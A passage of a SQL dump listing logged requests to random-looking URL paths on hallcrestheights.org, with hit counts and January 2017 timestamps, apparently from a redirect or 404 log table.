00:00:00'),(2899,'http://www.hallcrestheights.org/edzvd-lqco-k11234-mnnm-mcawvbfu/japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-i20162637-eyrupxp-udzikmu-sshe.htm',NULL,'','',1,0,'2017-01-08 07:03:33','0000-00-00 00:00:00'),(2900,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh-i20162636-k43004-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-08 07:03:41','0000-00-00 00:00:00'),(2901,'http://www.hallcrestheights.org/lugdl-trsm-xxhy/k11434-pzqjllzo-hnjumnte-i20162637-cwfogy-wbiwy.htm',NULL,'','',1,0,'2017-01-08 07:05:50','0000-00-00 00:00:00'),(2902,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-i20162632-yldpijaa-mdurta-enpgg-wtdvlx-k53084-tdqku-nfglqrh-zyonxfe-qnzs.htm',NULL,'','',1,0,'2017-01-08 07:07:13','0000-00-00 00:00:00'),(2903,'http://www.hallcrestheights.org/zmkue-dtzj-k11034-ivyo/qxifgxuh-xptvuhmi-i20162637-wnzkor-pvubf-gnqtpm.htm',NULL,'','',1,0,'2017-01-08 07:08:06','0000-00-00 00:00:00'),(2904,'http://www.hallcrestheights.org/zmkue-dtzj-k52634-ivyo-qxifgxuh/xptvuhmi-wnzkor-pvubf-gnqtpm-i20162636-hprbi-kzonmtl-ajholjr-dklt.htm',NULL,'','',1,0,'2017-01-08 07:08:51','0000-00-00 00:00:00'),(2905,'http://www.hallcrestheights.org/fadla-i20162636-jfnl/gfpc-vwgmyhde-k52234-cwxbdeud.htm',NULL,'','',1,0,'2017-01-08 07:09:36','0000-00-00 00:00:00'),(2906,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv-k10784-fcwqz-i20162637-hribnkn-yfeebsb-jhfk.htm',NULL,'','',1,0,'2017-01-08 07:10:44','0000-00-00 00:00:00'),(2907,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-k11184-rdhcpgzz-dllimv-yxjlt-i20162637-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-08 07:12:05','0000-00-00 00:00:00'),(2908,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-i20162632-uourxivl-btrhnn-mtqzk-owtsxp-k48764-pbgrr-cdsikib-kxnpfov-pyay.htm',NULL,'','',1,0,'2017-01-08 07:14:16','0000-00-00 00:00:00'),(2909,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx/k52134-rdhcpgzz-dllimv-i20162636-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-08 07:15:30','0000-00-00 00:00:00'),(2910,'http://www.hallcrestheights.org/jglet-kymd-rqzn-rvmlkswa/k11634-zvkecqqn-eeiaqj-zlnpl-i20162637-qfcneb-xilnv-oxbdjve.htm',NULL,'','',1,0,'2017-01-08 07:17:11','0000-00-00 00:00:00'),(2911,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-k53984-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-08 07:17:48','0000-00-00 00:00:00'),(2912,'http://www.hallcrestheights.org/qlbowcig-i20162633-gece-ayafxrg-lnikghhm-bbxpgesm-k28341-rcai-ztbi-auwdt/',NULL,'','',1,0,'2017-01-08 07:21:29','0000-00-00 00:00:00'),(2913,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg-i20162632-eyooayik-uksszq-cebaq-domytn-k31484-iholb-dentafy-mluzext-lfgg.htm',NULL,'','',1,0,'2017-01-08 07:24:54','0000-00-00 00:00:00'),(2914,'http://www.hallcrestheights.org/htxwhykr-svsv-hudykbq-xdosfiet-yuaixnrb-k48501-dggs-i20162630-aarh-efskj/',NULL,'','',1,0,'2017-01-08 07:28:24','0000-00-00 00:00:00'),(2915,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-hnjumnte-i20162633-cwfogy-wbiwy-rurfgv-k10784-fcwqz-hribnkn-yfeebsb-jhfk.htm',NULL,'','',1,0,'2017-01-08 07:31:56','0000-00-00 00:00:00'),(2916,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv-bfuj-apyvrl-flxhqj-i20162634-kuhkc-mumbhmg-k51716-znkohey-rupxpu-dzikmus-sheq.htm',NULL,'','',1,0,'2017-01-08 07:35:29','0000-00-00 00:00:00'),(2917,'http://www.hallcrestheights.org/tkuykfjd-k62001-njjb-ucyupaj-aylrlwfv-dyruqpkl-sdef-hxdf-i20162631-pdfuf/',NULL,'','',1,0,'2017-01-08 07:39:00','0000-00-00 00:00:00'),(2918,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl-lzoh-njumnt-ecwfog-ywbiw-i20162635-yrurfgv-k10316-fcwqzhr-ibnkny-feebsbj-hfkw.htm',NULL,'','',1,0,'2017-01-08 07:42:38','0000-00-00 00:00:00'),(2919,'http://www.hallcrestheights.org/fadlaj-fnlgfp-cvwgmy-hdec-wxbdeu-dkovfi-ibptq-uhzxchh-k33176-rmxagfp-i20162637-apuhgf-qvjdclb-bvzg.htm',NULL,'','',1,0,'2017-01-08 07:49:38','0000-00-00 00:00:00'),(2920,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl-lzoh-njumnt-ecwfog-ywbiw-yrurfgv-k54776-fcwqzhr-i20162637-ibnkny-feebsbj-hfkw.htm',NULL,'','',1,0,'2017-01-08 07:53:08','0000-00-00 00:00:00'),(2921,'http://www.hallcrestheights.org/cwhriwgp-k55881-ekzq-i20162634-dwkvumz-bsaiimjz-fozgdvdd-qjvd-obkn-lykco/',NULL,'','',1,0,'2017-01-08 07:56:41','0000-00-00 00:00:00'),(2922,'http://www.hallcrestheights.org/ajqxxucu-k34281-zaof-i20162634-ifephii-jimjnjbo-gtsakbcc-gyfm-dvju-xzlek/',NULL,'','',1,0,'2017-01-08 08:00:13','0000-00-00 00:00:00'),(2923,'http://www.hallcrestheights.org/soegszxy-ifet-i20162634-vtndyuu-hvfcyzls-xxqroxae-k35181-hksk-xyxe-mbuqu/',NULL,'','',1,0,'2017-01-08 08:03:45','0000-00-00 00:00:00'),(2924,'http://www.hallcrestheights.org/jgle-tkymdrq-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-i20162634-k11712-xbdj-veebikpt-jvlxfaye.htm',NULL,'','',1,0,'2017-01-08 08:10:48','0000-00-00 00:00:00'),(2925,'http://www.hallcrestheights.org/ryvhr-hmqt-k51834-yysl-lgeajanp/dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw-i20162636-scpuakq.htm',NULL,'','',1,0,'2017-01-08 08:11:49','0000-00-00 00:00:00'),(2926,'http://www.hallcrestheights.org/ryvhr-hmqt/k11534-yysl-i20162637-lgeajanp-dmefnxhq-fhjdyh.htm',NULL,'','',1,0,'2017-01-08 08:13:30','0000-00-00 00:00:00'),(2927,'http://www.hallcrestheights.org/ixnmue-ahwhio/k9566-zhjxbn-i20162635-wpge.htm',NULL,'','',1,0,'2017-01-08 08:15:18','0000-00-00 00:00:00'),(2928,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-k15699-snop-i20162629-dgfnh/skrl-jrgfctf-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb/',NULL,'','',1,0,'2017-01-08 08:16:57','0000-00-00 00:00:00'),(2929,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-i20162629-k25149-zbsai-imjz-fozgdvd-dqjvdob-knlyk-conedw-jmax-evortbzq/',NULL,'','',1,0,'2017-01-08 08:18:40','0000-00-00 00:00:00'),(2930,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf-rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-i20162629-k36249-ayfw/',NULL,'','',1,0,'2017-01-08 08:20:19','0000-00-00 00:00:00'),(2931,'http://www.hallcrestheights.org/gnfz-nxvjxpa-ltitj-shkyjy-i20162630-ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq-k43932-rhzyonxf-eqnzsvvb.htm',NULL,'','',1,0,'2017-01-08 08:21:24','0000-00-00 00:00:00'),(2932,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-dgfnh-i20162629-k26905-skrlj-rgfctfz-fiwx/',NULL,'','',1,0,'2017-01-08 08:22:01','0000-00-00 00:00:00'),(2933,'http://www.hallcrestheights.org/i20162628-jgle-k27442-tkymdrq-znrvm-lkswaz/vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo-xbdj.htm',NULL,'','',1,0,'2017-01-08 08:25:26','0000-00-00 00:00:00'),(2934,'http://www.hallcrestheights.org/upttm-i20162633-nbea-tgrb/nqcdcncx-rdhcpgzz-dllimv-k26914-yxjlt.htm',NULL,'','',1,0,'2017-01-08 08:27:09','0000-00-00 00:00:00'),(2935,'http://www.hallcrestheights.org/ryvh-rhmqtyy-sllge-ajanpd-mefnxhq-fhjdyhao-k32412-xrcjhwu-vdsvezyt-i20162634-wlcy-cwscpuak-qnjtnply.htm',NULL,'','',1,0,'2017-01-08 08:28:29','0000-00-00 00:00:00'),(2936,'http://www.hallcrestheights.org/i20162635-xhajvq-lwczbiqs/osqx-oqkgq-k38599-aqyd/',NULL,'','',1,0,'2017-01-08 08:28:52','0000-00-00 00:00:00'),(2937,'http://www.hallcrestheights.org/i20162630-qlbowci-ggece-ayafxr-k35673-glnikg-hhmbb-xpge-smrcai-ztbiau-wdtvixp-mtzhz/',NULL,'','',1,0,'2017-01-08 08:30:33','0000-00-00 00:00:00'),(2938,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh/xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-k21954-kzonmtl-i20162636-ajholjr.htm',NULL,'','',1,0,'2017-01-08 08:32:16','0000-00-00 00:00:00'),(2939,'http://www.hallcrestheights.org/zmku-edtzjiv-k54012-yoqxi-fgxuhx-ptvuhmi-wnzkorpv-ubfgnqt-i20162633-pmhprbik-zonm-tlajholj-rdkltsqw.htm',NULL,'','',1,0,'2017-01-08 08:35:33','0000-00-00 00:00:00'),(2940,'http://www.hallcrestheights.org/oiyiz-golrcm-i20162634-wfbsn-opdg-fnhskrl-k32157-jrgfctfz-fiwxwmak-oayosmp/',NULL,'','',1,0,'2017-01-08 08:35:42','0000-00-00 00:00:00'),(2941,'http://www.hallcrestheights.org/tkuyk-k11457-fjdnjj-bucyu-i20162635-paja-ylrlwfv-dyruqpkl-sdefhxdf-pdfufpf/',NULL,'','',1,0,'2017-01-08 08:39:06','0000-00-00 00:00:00'),(2942,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu-i20162629-uhvfc/yzlsx-xqroxae-k18255-hksk-xyxembuq-udtwq-ceyvuc-iwqws/',NULL,'','',1,0,'2017-01-08 08:41:13','0000-00-00 00:00:00'),(2943,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj-xbnwpgey-ooayiku-ksszqc-ebaqd-i20162634-omytniho-lbde-k4808-ntafym-luze-xtlf-ggcsd.htm',NULL,'','',1,0,'2017-01-08 08:42:37','0000-00-00 00:00:00'),(2944,'http://www.hallcrestheights.org/jgletkym-k36100-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-nplqfc-i20162635-nebx-ilnvoxbd.htm',NULL,'','',1,0,'2017-01-08 09:03:31','0000-00-00 00:00:00'),(2945,'http://www.hallcrestheights.org/edzvdlqc-k37000-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-i20162635-hmgz-nkoheyru.htm',NULL,'','',1,0,'2017-01-08 09:09:10','0000-00-00 00:00:00'),(2946,'http://www.hallcrestheights.org/yembjvh-k55273-tqqdc-kzfltz-terqbw-nswns-i20162630-njpl-pftrrj/',NULL,'','',1,0,'2017-01-08 09:12:55','0000-00-00 00:00:00'),(2947,'http://www.hallcrestheights.org/i20162628-pcscqruf-k29440-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-08 09:14:54','0000-00-00 00:00:00'),(2948,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb/qxdosf-ietyu-aixn-rbdggs-i20162631-k60903-aarhef/',NULL,'','',1,0,'2017-01-08 09:18:21','0000-00-00 00:00:00'),(2949,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-tvixp-mtzhzz-wzrqr-k39755-dcfpsmf/',NULL,'','',1,0,'2017-01-08 09:20:03','0000-00-00 00:00:00'),(2950,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos-i20162629-fiety-k16105-uaixnrb-dggs/',NULL,'','',5,0,'2017-01-08 09:20:30','0000-00-00 00:00:00'),(2951,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-oqkgq-i20162629-aqydc-ptznzvt-k36805-jqoe/',NULL,'','',3,0,'2017-01-08 09:23:20','0000-00-00 00:00:00'),(2952,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes-i20162629-rkwtz/k19155-qtqbs-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-holvg/',NULL,'','',1,0,'2017-01-08 09:23:28','0000-00-00 00:00:00'),(2953,'http://www.hallcrestheights.org/nfrkopd-i20162631-obbum/golzes-k60703-rkwtzq-tqbsv/',NULL,'','',1,0,'2017-01-08 09:26:53','0000-00-00 00:00:00'),(2954,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-k37705-cmckf-i20162629-rdtfk-gpvbchs-iwho/',NULL,'','',3,0,'2017-01-08 09:30:17','0000-00-00 00:00:00'),(2955,'http://www.hallcrestheights.org/ryvhrhmq-k40420-tyysl-lgeajanp-i20162631-dmefnxh-qfhj-dyhao-xrcjhw-uvds-vezytwlc.htm',NULL,'','',1,0,'2017-01-08 09:31:51','0000-00-00 00:00:00'),(2956,'http://www.hallcrestheights.org/vqjnyspv-k47620-holjp-eurrtpil-uourxiv-i20162632-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-08 09:37:31','0000-00-00 00:00:00'),(2957,'http://www.hallcrestheights.org/tkuy-i20162629-k37405-kfjdnjj-bucyupa-jaylr-lwfvd-yruqpkl-sdef-hxdfpdfu-fpfaj/',NULL,'','',1,0,'2017-01-08 09:40:31','0000-00-00 00:00:00'),(2958,'http://www.hallcrestheights.org/k16005-xhaj-vqlwczb-iqsosqx-i20162629-oqkgq-aqydc-ptznzvt-jqoe-vpcaqwja-luwty-bckbsx-bnbgn/',NULL,'','',1,0,'2017-01-08 09:45:38','0000-00-00 00:00:00'),(2959,'http://www.hallcrestheights.org/yemb-jvhtqqd-ckzfltz-i20162629-terqb/wnswn-snjplpf-trrj-ncypjoqw-gzjev-ihsdpa-k16455-caylh/',NULL,'','',1,0,'2017-01-08 09:50:44','0000-00-00 00:00:00'),(2960,'http://www.hallcrestheights.org/upttmnbe-k25120-atgrb-nqcdcncx-rdhcpgz-i20162632-zdll-imvyx-jltfeo-bkeb-wivsmqkr.htm',NULL,'','',1,0,'2017-01-08 09:51:42','0000-00-00 00:00:00'),(2961,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy/i20162630-zlsxx-qrox-aehksk-xyxemb-uqudtwq-k46803-ceyvu-ciwqw/',NULL,'','',1,0,'2017-01-08 09:52:27','0000-00-00 00:00:00'),(2962,'http://www.hallcrestheights.org/k16555-nfrk-opdobbu-mgolzes/rkwtz-i20162629-qtqbs-vjcwjbx-nmyv/',NULL,'','',1,0,'2017-01-08 09:54:09','0000-00-00 00:00:00'),(2963,'http://www.hallcrestheights.org/oiyizgo-lrcmw-fbsnop-i20162631-dgfnhs-krljr-k60653-gfct-fzfiwx-wmakoa-yosmpql-gvegd-fvgcr-cbzmqnod/',NULL,'','',1,0,'2017-01-08 09:55:52','0000-00-00 00:00:00'),(2964,'http://www.hallcrestheights.org/yemb-k37255-jvhtqqd-ckzfltz/terqb-i20162629-wnswn-snjplpf-trrj/',NULL,'','',1,0,'2017-01-08 09:57:34','0000-00-00 00:00:00'),(2965,'http://www.hallcrestheights.org/fadlajfn-k39520-lgfpc-vwgmyhde-i20162631-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap.htm',NULL,'','',1,0,'2017-01-08 10:00:11','0000-00-00 00:00:00'),(2966,'http://www.hallcrestheights.org/vqjnyspv-k17200-holjp-eurrtpil-uourxiv-lbtr-hnnmt-qzkowt-i20162635-sxpp-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-08 10:05:50','0000-00-00 00:00:00'),(2967,'http://www.hallcrestheights.org/gnfznxvj-k37900-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-i20162635-vlxt-dqkunfgl.htm',NULL,'','',1,0,'2017-01-08 10:11:30','0000-00-00 00:00:00'),(2968,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi/ijimj-njbog-i20162629-tsakbcc-gyfm-k36855-dvjuxzle/',NULL,'','',1,0,'2017-01-08 10:12:56','0000-00-00 00:00:00'),(2969,'http://www.hallcrestheights.org/kzpffms-k36373-xklrd-edhwge-fvbbgz-agpec-i20162630-iyyu-wuvfzt/',NULL,'','',1,0,'2017-01-08 10:20:01','0000-00-00 00:00:00'),(2970,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-qxdos-i20162629-k39505-fiety-uaixnrb-dggs/',NULL,'','',1,0,'2017-01-08 10:31:21','0000-00-00 00:00:00'),(2971,'http://www.hallcrestheights.org/dvisciwb-k58600-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-i20162634-mnpzvs-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-01-08 10:37:00','0000-00-00 00:00:00'),(2972,'http://www.hallcrestheights.org/pcscqruf-k45820-unpkw-xpoideot-wtvsoar-i20162632-mosm-gepla-lheliy-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-08 10:39:51','0000-00-00 00:00:00'),(2973,'http://www.hallcrestheights.org/k16855-cwhr-iwgpekz/qdwkvum-zbsai-i20162629-imjzf/',NULL,'','',1,0,'2017-01-08 10:42:01','0000-00-00 00:00:00'),(2974,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu/k37755-uhvfc-yzlsx-i20162629-xqroxae-hksk-xyxembuq/',NULL,'','',1,0,'2017-01-08 10:43:38','0000-00-00 00:00:00'),(2975,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge/k46903-fvbbgz-agpec-i20162630-iyyu-wuvfzt/',NULL,'','',1,0,'2017-01-08 10:45:21','0000-00-00 00:00:00'),(2976,'http://www.hallcrestheights.org/cwhriwg-pekzq-dwkvum-zbsaii-mjzfo-i20162630-k47353-zgdv-ddqjvd/',NULL,'','',1,0,'2017-01-08 10:45:31','0000-00-00 00:00:00'),(2977,'http://www.hallcrestheights.org/ixnmueah-k46720-whioz-hjxbnwpg-eyooayi-i20162632-kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-08 10:48:21','0000-00-00 00:00:00'),(2978,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-vtzpxb-k35473-xkcwj-i20162630-ybty-lwosdu/',NULL,'','',1,0,'2017-01-08 10:54:01','0000-00-00 00:00:00'),(2979,'http://www.hallcrestheights.org/ixnmueah-k16300-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-i20162635-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-08 10:56:50','0000-00-00 00:00:00'),(2980,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf-rdtfk-i20162630-gpvbchs-k16645-iwho/',NULL,'','',2,0,'2017-01-08 10:59:41','0000-00-00 00:00:00'),(2981,'http://www.hallcrestheights.org/htxw-hykrsvs-vhudykb-i20162629-qxdos-fiety-k18705-uaixnrb-dggs-aarhefsk-jydmr-ujwimj-qiaau/',NULL,'','',1,0,'2017-01-08 11:02:25','0000-00-00 00:00:00'),(2982,'http://www.hallcrestheights.org/ixnm-k32212-ueahwhi-ozhjx-bnwpge-yooayik-uksszqce-i20162634-baqdomy-tniholbd-enta.htm',NULL,'','',1,0,'2017-01-08 11:02:30','0000-00-00 00:00:00'),(2983,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-i20162629-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-k37155-tvixp-mtzhzz-wzrqr/',NULL,'','',1,0,'2017-01-08 11:04:08','0000-00-00 00:00:00'),(2984,'http://www.hallcrestheights.org/fadl-k43732-ajfnlgf-i20162630-pcvwg-myhdec-wxbdeud-kovfiibp-tquhzxc-hhrmxagf-papu.htm',NULL,'','',1,0,'2017-01-08 11:05:20','0000-00-00 00:00:00'),(2985,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr/dedhwge-fvbbg-zagpe-k39155-ciyyuwu/',NULL,'','',1,0,'2017-01-08 11:05:49','0000-00-00 00:00:00'),(2986,'http://www.hallcrestheights.org/ajqx-i20162629-k40105-xucuzao-fifephi-ijimj-njbog-tsakbcc-gyfm-dvjuxzle-ktsls/',NULL,'','',1,0,'2017-01-08 11:07:32','0000-00-00 00:00:00'),(2987,'http://www.hallcrestheights.org/lugd-k11512-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-i20162634-iwyrurf-gvfcwqzh-ribn.htm',NULL,'','',1,0,'2017-01-08 11:08:12','0000-00-00 00:00:00'),(2988,'http://www.hallcrestheights.org/qlbowci-ggece/ayafxr-i20162631-glnikg-hhmbb-k60503-xpge/',NULL,'','',1,0,'2017-01-08 11:09:14','0000-00-00 00:00:00'),(2989,'http://www.hallcrestheights.org/k18655-ajqx-xucuzao/fifephi-ijimj-i20162629-njbog/',NULL,'','',1,0,'2017-01-08 11:10:57','0000-00-00 00:00:00'),(2990,'http://www.hallcrestheights.org/soegszx-yifet-k57073-vtndyu-uhvfcy-zlsxx-i20162630-qrox-aehksk/',NULL,'','',1,0,'2017-01-08 11:11:00','0000-00-00 00:00:00'),(2991,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx-i20162629-k39405-oqkgq-aqydc-ptznzvt-jqoe-vpcaqwja-luwty-bckbsx-bnbgn/',NULL,'','',1,0,'2017-01-08 11:12:39','0000-00-00 00:00:00'),(2992,'http://www.hallcrestheights.org/edzv-k52912-dlqcomn-nmmca-wvbfuj-apyvrlf-i20162633-lxhqjkuh-kcmumbh-mgznkohe-yrup.htm',NULL,'','',1,0,'2017-01-08 11:13:51','0000-00-00 00:00:00'),(2993,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-i20162629-cmckf-rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa-k16905-ayfwgd-xskmy/',NULL,'','',1,0,'2017-01-08 11:14:21','0000-00-00 00:00:00'),(2994,'http://www.hallcrestheights.org/bsoapaz-apsta-sgmhcq/k47403-cmckfr-dtfkg-pvbc-i20162630-hsiwho-rklvzr/',NULL,'','',1,0,'2017-01-08 11:16:05','0000-00-00 00:00:00'),(2995,'http://www.hallcrestheights.org/ajqxxuc-uzaof-k60853-ifephi-ijimjn-jbogt-sakb-i20162631-ccgyfm/',NULL,'','',1,0,'2017-01-08 11:16:40','0000-00-00 00:00:00'),(2996,'http://www.hallcrestheights.org/uptt-k10612-mnbeatg-rbnqc-dcncxr-dhcpgzz-dllimvyx-i20162634-jltfeob-kebwivsm-qkrf.htm',NULL,'','',1,0,'2017-01-08 11:19:31','0000-00-00 00:00:00'),(2997,'http://www.hallcrestheights.org/gnfz-k53812-nxvjxpa-ltitj-shkyjy-ldpijaa-i20162633-mdurtaen-pggwtdv-lxtdqkun-fglq.htm',NULL,'','',1,0,'2017-01-08 11:25:10','0000-00-00 00:00:00'),(2998,'http://www.hallcrestheights.org/yemb-i20162629-k39205-jvhtqqd-ckzfltz-terqb-wnswn-snjplpf-trrj-ncypjoqw-gzjev/',NULL,'','',1,0,'2017-01-08 11:28:01','0000-00-00 00:00:00'),(2999,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-k5449-oqkgq-i20162629-aqyd-cptznzv-tjqoevp/',NULL,'','',1,0,'2017-01-08 11:28:01','0000-00-00 00:00:00'),(3000,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-fvbbgz/agpec-i20162631-iyyu-wuvfzt-jigjin-amzbcng-tfmly-k61203-rghdf/',NULL,'','',1,0,'2017-01-08 11:29:43','0000-00-00 00:00:00'),(3001,'http://www.hallcrestheights.org/pcsc-k31312-qrufunp-kwxpo-ideotw-tvsoarm-osmgepla-i20162634-lheliyr-qiyqfufx-vugo.htm',NULL,'','',1,0,'2017-01-08 11:30:50','0000-00-00 00:00:00'),(3002,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq/cmckf-rdtfk-i20162629-gpvbchs-iwho-k18855-rklvzrtj/',NULL,'','',1,0,'2017-01-08 11:31:25','0000-00-00 00:00:00'),(3003,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu-mgolzes-rkwtz-qtqbs-k39305-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-holvg-wxkwoih/',NULL,'','',2,0,'2017-01-08 11:32:33','0000-00-00 00:00:00'),(3004,'http://www.hallcrestheights.org/nfrk-i20162629-k18505-opdobbu-mgolzes-rkwtz-qtqbs-vjcwjbx-nmyv-sssldjzn-aahjb/',NULL,'','',1,0,'2017-01-08 11:33:08','0000-00-00 00:00:00'),(3005,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-i20162634-kcmumb-hmgz-k57800-nkoheyru-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-08 11:34:51','0000-00-00 00:00:00'),(3006,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-msmv-i20162634-uclzup-hvqawu-k51216-oxzmn-pzvsgcr-lycmczo-qqelud.htm',NULL,'','',1,0,'2017-01-08 11:36:31','0000-00-00 00:00:00'),(3007,'http://www.hallcrestheights.org/jglet-kymd-k26714-rqzn-rvmlkswa/zvkecqqn-i20162633-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve-ebikptj-vlxf.htm',NULL,'','',1,0,'2017-01-08 11:38:13','0000-00-00 00:00:00'),(3008,'http://www.hallcrestheights.org/dvisciw-k9928-bvwkuxkr-bzomsmvu-clzuphv-qawuox-i20162633-zmnpz-vsgcrlyc-mczo-qqelud.htm',NULL,'','',1,0,'2017-01-08 11:39:21','0000-00-00 00:00:00'),(3009,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-hmgz-i20162636-k15680-nkoheyru-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-08 11:39:59','0000-00-00 00:00:00'),(3010,'http://www.hallcrestheights.org/ixnmueah-k57250-whioz-hjxbnwpg-eyooayi/kuks-szqce-i20162634-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-08 11:41:40','0000-00-00 00:00:00'),(3011,'http://www.hallcrestheights.org/edzvdlq-k4708-comnnmmc-awvbfuja-pyvrlfl-xhqjku-hkcmu-i20162634-mbhmgznk-ohey-rupxpu.htm',NULL,'','',1,0,'2017-01-08 11:47:52','0000-00-00 00:00:00'),(3012,'http://www.hallcrestheights.org/edzvdlq-k11728-comnnmmc-awvbfuja-pyvrlfl-xhqjku-i20162633-hkcmu-mbhmgznk-ohey-rupxpu.htm',NULL,'','',1,0,'2017-01-08 11:50:41','0000-00-00 00:00:00'),(3013,'http://www.hallcrestheights.org/upttm-nbea-tgrb-i20162633-nqcdcncx-k27564-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-08 11:53:33','0000-00-00 00:00:00'),(3014,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-k42504-hnjumnte-cwfogy-i20162636-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-08 11:56:21','0000-00-00 00:00:00'),(3015,'http://www.hallcrestheights.org/bsoa-i20162629-pazapst/asgmhcq-k58895-cmckf/',NULL,'','',1,0,'2017-01-08 12:00:25','0000-00-00 00:00:00'),(3016,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-i20162633-pzqjllzo-k12084-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-08 12:02:02','0000-00-00 00:00:00'),(3017,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf/k6795-vtzpx-bxkcw-jybtylw-i20162630-osdu-ieqgwsog/',NULL,'','',1,0,'2017-01-08 12:02:07','0000-00-00 00:00:00'),(3018,'http://www.hallcrestheights.org/zmku-edtzjiv-i20162634-yoqxi/fgxuhx-k10462-ptvuhmi-wnzkorpv-ubfgnqt.htm',NULL,'','',1,0,'2017-01-08 12:03:49','0000-00-00 00:00:00'),(3019,'http://www.hallcrestheights.org/edzvd-lqco-i20162632-mnnm-mcawvbfu-k53484-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-08 12:04:52','0000-00-00 00:00:00'),(3020,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-k9949-yupa-jaylr-i20162636-lwfv-dyruqpk-lsdefhx/',NULL,'','',3,0,'2017-01-08 12:07:41','0000-00-00 